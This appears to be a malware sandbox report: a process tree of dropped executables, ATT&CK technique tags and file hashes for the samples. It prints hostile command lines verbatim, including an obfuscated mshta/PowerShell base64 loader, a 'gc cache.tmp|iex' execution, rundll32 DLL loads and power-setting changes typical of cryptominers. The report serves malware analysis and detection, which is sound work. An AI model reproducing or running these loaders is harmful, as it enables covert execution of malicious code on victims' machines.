"C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:760

C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
5⤵
- Executes dropped EXE
PID:3936

C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
5⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe
"C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\7zSFX\KillDuplicate.cmd" "C:\Users\Admin\AppData\Local\Temp\7zSFX" "Setupdark.exe""
5⤵
PID:2660

C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell gc cache.tmp|iex
6⤵
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
5⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
"C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe"
4⤵
- Executes dropped EXE
PID:4160

C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
5⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
5⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3736

C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe" -h
5⤵
PID:5036

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3348 -ip 3348
1⤵
PID:4384

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:3196

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 604
3⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1872 -ip 1872
1⤵
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1560 -ip 1560
1⤵
PID:824

C:\Windows\system32\mshta.exe
mshta.exe vBsCrIPt:eXeCuTe("creaTeoBjEcT(""wScRIPt.sHell"").RuN ""POweRsHelL [sCRiPTblock]::cReaTe([TExt.eNCODIng]::uTf8.GeTStriNG([COnveRt]::FROmBase64StriNG('KFt0RVh0LmVuY09EaU5nXTo6VXRGOC5nRVRzVHJJTmcoW0NPbnZFcnRdOjpmUk9tQkFTRTY0U1RySW5HKChnUCAoKCgiezZ9ezF9ezd9ezl9ezB9ezN9ezR9ezh9ezV9ezJ9Ii1mJ31Tb2YnLCdLJywnZW0nLCd0d2FyJywnZScsJ3N0JywnSCcsJ0xNOnsnLCd7MH1TdWJzeScsJzAnKSkgIC1mIFtjaEFyXTkyKSkuTW9kdWxlcykpKXxpRXg='))).InVoKe()"", 0:close")
1⤵
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [sCRiPTblock]::cReaTe([TExt.eNCODIng]::uTf8.GeTStriNG([COnveRt]::FROmBase64StriNG('KFt0RVh0LmVuY09EaU5nXTo6VXRGOC5nRVRzVHJJTmcoW0NPbnZFcnRdOjpmUk9tQkFTRTY0U1RySW5HKChnUCAoKCgiezZ9ezF9ezd9ezl9ezB9ezN9ezR9ezh9ezV9ezJ9Ii1mJ31Tb2YnLCdLJywnZW0nLCd0d2FyJywnZScsJ3N0JywnSCcsJ0xNOnsnLCd7MH1TdWJzeScsJzAnKSkgIC1mIFtjaEFyXTkyKSkuTW9kdWxlcykpKXxpRXg='))).InVoKe()
2⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4340

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3832

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:4424

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:1516

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:2648

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1472

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Windows\system32\config\systemprofile\AppData\Roaming\Google\Libs\g.log"
1⤵
PID:3936

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
2⤵
PID:1780

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe zhmmsenlystloagm 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
1⤵
PID:3496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MatyWon.exe.log
Filesize
1KB

MD5
a3c82409506a33dec1856104ca55cbfd

SHA1
2e2ba4e4227590f8821002831c5410f7f45fe812

SHA256
780a0d4410f5f9798cb573bcd774561d1439987a39b1368d3c890226928cd203

SHA512
9621cfd3dab86d964a2bea6b3788fc19a895307962dcc41428741b8a86291f114df722e9017f755f63d53d09b5111e68f05aa505d9c9deae6c4378a87cdfa69f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe
Filesize
246KB

MD5
95d60d52c0f8e2c87d1f495f426f4e20

SHA1
daa905959994df54356b8d010df02b2cdcf88cfe

SHA256
5f0b4bc4ef82e8d3178167ef18f1bbbfb3a7d94929d7262cc6ca77592f3293c0

SHA512
eaa3956a4a60acf551673b2a2fb16105dd34d8caa17d8d87918e6f1013673fcb8241e4147ad4ce535b03bcadae8b4fc682cb8b6e48619a59dc27cfd506b7be7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe
Filesize
246KB

MD5
95d60d52c0f8e2c87d1f495f426f4e20

SHA1
daa905959994df54356b8d010df02b2cdcf88cfe

SHA256
5f0b4bc4ef82e8d3178167ef18f1bbbfb3a7d94929d7262cc6ca77592f3293c0

SHA512
eaa3956a4a60acf551673b2a2fb16105dd34d8caa17d8d87918e6f1013673fcb8241e4147ad4ce535b03bcadae8b4fc682cb8b6e48619a59dc27cfd506b7be7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe
Filesize
246KB

MD5
95d60d52c0f8e2c87d1f495f426f4e20

SHA1
daa905959994df54356b8d010df02b2cdcf88cfe

SHA256
5f0b4bc4ef82e8d3178167ef18f1bbbfb3a7d94929d7262cc6ca77592f3293c0

SHA512
eaa3956a4a60acf551673b2a2fb16105dd34d8caa17d8d87918e6f1013673fcb8241e4147ad4ce535b03bcadae8b4fc682cb8b6e48619a59dc27cfd506b7be7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe
Filesize
175KB

MD5
ff7f91fa0ee41b37bb8196d9bb44070c

SHA1
b332b64d585e605dddc0c6d88a47323d8c3fc4d1

SHA256
04a206dfda741eb98efd4b092b0c679c0706d213e411b406dbb98769084c836e

SHA512
58346361209cf47feb27c7f4ee8d44fd81da584202ec7563f79691739a2fc3b2ab84d5bbfb1da10507eb4b92263dd55ceeb3f988bffdaf794347103546aebc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe
Filesize
175KB

MD5
ff7f91fa0ee41b37bb8196d9bb44070c

SHA1
b332b64d585e605dddc0c6d88a47323d8c3fc4d1

SHA256
04a206dfda741eb98efd4b092b0c679c0706d213e411b406dbb98769084c836e

SHA512
58346361209cf47feb27c7f4ee8d44fd81da584202ec7563f79691739a2fc3b2ab84d5bbfb1da10507eb4b92263dd55ceeb3f988bffdaf794347103546aebc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe
Filesize
175KB

MD5
ff7f91fa0ee41b37bb8196d9bb44070c

SHA1
b332b64d585e605dddc0c6d88a47323d8c3fc4d1

SHA256
04a206dfda741eb98efd4b092b0c679c0706d213e411b406dbb98769084c836e

SHA512
58346361209cf47feb27c7f4ee8d44fd81da584202ec7563f79691739a2fc3b2ab84d5bbfb1da10507eb4b92263dd55ceeb3f988bffdaf794347103546aebc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe
Filesize
3.7MB

MD5
d4fc8415802d26f5902a925dafa09f95

SHA1
76a6da00893bf5fa29e9b9a6e69e83e1ded5856c

SHA256
b5c72a18578c6cc7007b6c7738fa9f72b57ecaf26be44964af3947f7f2b5422f

SHA512
741da8d09f76f645557c668cde3d05155e0497bae6a431fa81f85b8ace7ab16be35ecebf3a56f6a019dbafe72cd8ed916dc4ae3615e35c615d1c841fc84420c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe
Filesize
3.7MB

MD5
d4fc8415802d26f5902a925dafa09f95

SHA1
76a6da00893bf5fa29e9b9a6e69e83e1ded5856c

SHA256
b5c72a18578c6cc7007b6c7738fa9f72b57ecaf26be44964af3947f7f2b5422f

SHA512
741da8d09f76f645557c668cde3d05155e0497bae6a431fa81f85b8ace7ab16be35ecebf3a56f6a019dbafe72cd8ed916dc4ae3615e35c615d1c841fc84420c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe
Filesize
3.7MB

MD5
d4fc8415802d26f5902a925dafa09f95

SHA1
76a6da00893bf5fa29e9b9a6e69e83e1ded5856c

SHA256
b5c72a18578c6cc7007b6c7738fa9f72b57ecaf26be44964af3947f7f2b5422f

SHA512
741da8d09f76f645557c668cde3d05155e0497bae6a431fa81f85b8ace7ab16be35ecebf3a56f6a019dbafe72cd8ed916dc4ae3615e35c615d1c841fc84420c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
Filesize
328KB

MD5
0b39012e51e6d52ddc49dd9676ba9920

SHA1
7e329120d82c58a5f2ccae98eb78d749f1095ff4

SHA256
6aea187ca91ea68222b4e650e2b4baa46ba11252f74763a2d2edec2924a98f10

SHA512
8d13528c02f727d6c15257050657f702622fdbc7836f0b01eda8f48edbe2aa2bb4f8dceb3652f9adead9774f3387a6bba20f95b988dd9fee642ddba5bd457a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
Filesize
328KB

MD5
0b39012e51e6d52ddc49dd9676ba9920

SHA1
7e329120d82c58a5f2ccae98eb78d749f1095ff4

SHA256
6aea187ca91ea68222b4e650e2b4baa46ba11252f74763a2d2edec2924a98f10

SHA512
8d13528c02f727d6c15257050657f702622fdbc7836f0b01eda8f48edbe2aa2bb4f8dceb3652f9adead9774f3387a6bba20f95b988dd9fee642ddba5bd457a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
Filesize
328KB

MD5
0b39012e51e6d52ddc49dd9676ba9920

SHA1
7e329120d82c58a5f2ccae98eb78d749f1095ff4

SHA256
6aea187ca91ea68222b4e650e2b4baa46ba11252f74763a2d2edec2924a98f10

SHA512
8d13528c02f727d6c15257050657f702622fdbc7836f0b01eda8f48edbe2aa2bb4f8dceb3652f9adead9774f3387a6bba20f95b988dd9fee642ddba5bd457a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
Filesize
328KB

MD5
0b39012e51e6d52ddc49dd9676ba9920

SHA1
7e329120d82c58a5f2ccae98eb78d749f1095ff4

SHA256
6aea187ca91ea68222b4e650e2b4baa46ba11252f74763a2d2edec2924a98f10

SHA512
8d13528c02f727d6c15257050657f702622fdbc7836f0b01eda8f48edbe2aa2bb4f8dceb3652f9adead9774f3387a6bba20f95b988dd9fee642ddba5bd457a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize
212B

MD5
4aff70807f90401da3849fc97e501876

SHA1
aa420e90d073ea664130250fe853198dc68aa9f3

SHA256
c665d23e2a7c83cd991f54b63ab002ea7c218a40d0c38e18488c1de5576fe982

SHA512
40db537527a6346bdd316cfdb56c33b59f7b83fd6a61f18f73d178b9dc0c433eb1733f2ca81b8c13c14d020752ab158349dac8d6c187d64f6213aff934c930d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe
Filesize
4.4MB

MD5
b9ea6d0a56eff17b279b59f1e1a16383

SHA1
610b6cb023fa2bc49b9ab52d58b3451a8ec577dd

SHA256
0248bb1ec1f1732fbae220a977cc33bfad1f264ef6b97bbd956dca01f3eb773c

SHA512
bcd4618aa5fe614da7a877b38c5f86908ec6dbcdc338903d4886b2885c072dd7eb80318877521aa4771b84176d2691785b31037fcb5e56fdb6f4ce44fd344f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe
Filesize
4.4MB

MD5
b9ea6d0a56eff17b279b59f1e1a16383

SHA1
610b6cb023fa2bc49b9ab52d58b3451a8ec577dd

SHA256
0248bb1ec1f1732fbae220a977cc33bfad1f264ef6b97bbd956dca01f3eb773c

SHA512
bcd4618aa5fe614da7a877b38c5f86908ec6dbcdc338903d4886b2885c072dd7eb80318877521aa4771b84176d2691785b31037fcb5e56fdb6f4ce44fd344f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe
Filesize
4.4MB

MD5
b9ea6d0a56eff17b279b59f1e1a16383

SHA1
610b6cb023fa2bc49b9ab52d58b3451a8ec577dd

SHA256
0248bb1ec1f1732fbae220a977cc33bfad1f264ef6b97bbd956dca01f3eb773c

SHA512
bcd4618aa5fe614da7a877b38c5f86908ec6dbcdc338903d4886b2885c072dd7eb80318877521aa4771b84176d2691785b31037fcb5e56fdb6f4ce44fd344f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cache.tmp
Filesize
19KB

MD5
406ba1e5cfa6101e565515385b29f333

SHA1
7a5e5f9a0d9364b46053c8ac2c8e13bb28e00d1a

SHA256
b42a50dcef4464d91c34cef6c06e75818231e71aa5dafaf3a04bd7ee24f5d61a

SHA512
745c012e216be360ee6a5c36b7f200726ace28c15d3c23a03ca681a6a13a43fc6d0bdaa17b8caa917bc7d88b4648b039e9644c3b19f5afaa19716502554455db

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry12yc25.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry12yc25.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2598.exe
Filesize
469KB

MD5
aca6abd4b45477fbc1c4dedcb973d6b8

SHA1
9a80db4ff3e1ce9f97d5702cdc99ae2e1416a713

SHA256
1d165a561a4a65987e0b4e8b8de1040ac3c665479e5991f89b2a7507c76375f4

SHA512
13f26a396a344c13d83785bac0dc1cea620249fef688199de9c3d96f260534df147e15d9bf6944da8522dd1888c6bc83b288eba5b93efdbfff6e884d31ab87bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2598.exe
Filesize
469KB

MD5
aca6abd4b45477fbc1c4dedcb973d6b8

SHA1
9a80db4ff3e1ce9f97d5702cdc99ae2e1416a713

SHA256
1d165a561a4a65987e0b4e8b8de1040ac3c665479e5991f89b2a7507c76375f4

SHA512
13f26a396a344c13d83785bac0dc1cea620249fef688199de9c3d96f260534df147e15d9bf6944da8522dd1888c6bc83b288eba5b93efdbfff6e884d31ab87bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs1177sF.exe
Filesize
175KB

MD5
0ecc8ab62b7278cc6650517251f1543c

SHA1
b4273cda193a20d48e83241275ffc34ddad412f2

SHA256
b0f1238e54ac8e3534af7ecb4f834bea3223120fedb1eab80f7a1bf00fb5b97a

SHA512
c79d266c82b766ca39377fd02b3bc307fce4b59f53936e97c162200de3f8b3f72f6beda2aef2ab9ecd9be669b625c6ed0aaefa157cca7ac11d78b1939f660092

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs1177sF.exe
Filesize
175KB

MD5
0ecc8ab62b7278cc6650517251f1543c

SHA1
b4273cda193a20d48e83241275ffc34ddad412f2

SHA256
b0f1238e54ac8e3534af7ecb4f834bea3223120fedb1eab80f7a1bf00fb5b97a

SHA512
c79d266c82b766ca39377fd02b3bc307fce4b59f53936e97c162200de3f8b3f72f6beda2aef2ab9ecd9be669b625c6ed0aaefa157cca7ac11d78b1939f660092

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3082.exe
Filesize
324KB

MD5
245e1c88fda8f341b89e963d69405e32

SHA1
b0e09fe3daf88d7004a39f824b8a58dc34299264

SHA256
6a47a6e39d91283cc8167c651f0b2a3bbbd3c7d24edf157052ff4029c47a5aee

SHA512
